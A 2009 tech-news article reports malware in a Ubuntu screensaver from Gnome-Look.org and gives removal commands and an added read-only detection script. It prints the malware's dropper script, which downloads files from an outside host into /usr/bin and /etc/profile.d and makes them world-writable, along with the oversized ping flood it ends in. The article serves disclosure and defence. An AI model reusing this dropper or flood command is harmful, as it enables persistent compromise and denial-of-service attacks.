Ubuntu: Malware in Screensaver from Gnome-Look.org
By Chinmoy Kanjilal on December 10th, 2009

A desktop screensaver available from Gnome-Look.org was reported to be malware that downloads an unauthorized script. This script is believed to enable a possible DDoS attack. The screensaver was removed from the website immediately after the malware was confirmed in this thread on the Ubuntu Forums.

The malware posing as a screensaver contains this script:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

The ultimate result of this script is:

ping -s 65507 www.mmowned.com

This seems harmless. Also, the site in question [ www.mmowned.com ] advertises protection against DoS attacks. This could be a prank or revenge against the company, or it could be part of something bigger that turns all the affected computers into bots.

If you have already installed the screensaver, remove it and protect your computer by issuing the commands:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash
and
sudo dpkg -r app5552
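
A read-only way to check a machine, or a mounted disk image, for traces of this screensaver before running the removal commands. This is an added example, not code from the original article or from Gnome-Look.org. The paths, package name and ping size are the ones quoted above; the function name and the optional root argument are assumptions.

```sh
#!/bin/sh
# Added example: read-only check for traces of the screensaver dropper.
# File paths, package name and ping size come from the article; the optional
# root argument (a mounted disk image or test tree) is an assumption.

check_screensaver_traces() {
    root="${1:-}"   # empty = live system
    hits=0

    # 1. Files the dropper script writes, plus run.bash from the cleanup command.
    for f in /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh; do
        if [ -e "$root$f" ]; then
            echo "dropped file present: $root$f"
            hits=$((hits + 1))
        fi
    done

    # 2. World-writable files in the directories where the script ran chmod 777.
    for d in /usr/bin /etc/profile.d; do
        [ -d "$root$d" ] || continue
        n=$(find "$root$d" -maxdepth 1 -type f -perm -0002 | wc -l)
        if [ "$n" -gt 0 ]; then
            find "$root$d" -maxdepth 1 -type f -perm -0002 | sed 's/^/world-writable: /'
            hits=$((hits + n))
        fi
    done

    # 3. Login scripts that mention the payload name or the oversized ping.
    if [ -d "$root/etc/profile.d" ]; then
        for s in "$root"/etc/profile.d/*; do
            [ -f "$s" ] || continue
            if grep -Eq 'Auto\.bash|ping -s 65507' "$s"; then
                echo "suspicious login script: $s"
                hits=$((hits + 1))
            fi
        done
    fi

    # 4. The package the article removes with dpkg -r (any state, even half-removed).
    if grep -qx 'Package: app5552' "$root/var/lib/dpkg/status" 2>/dev/null; then
        echo "package app5552 is recorded in the dpkg database"
        hits=$((hits + 1))
    fi

    [ "$hits" -eq 0 ]   # exit status 0 = no traces found
}
```

Call check_screensaver_traces with no argument on a live system, or pass the mount point of a disk image; a non-zero exit status means at least one trace was printed.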

[ Via OMG! UBUNTU! ]

Author: Chinmoy Kanjilal

Copyright 2006-2012 Techie Buzz. All Rights Reserved.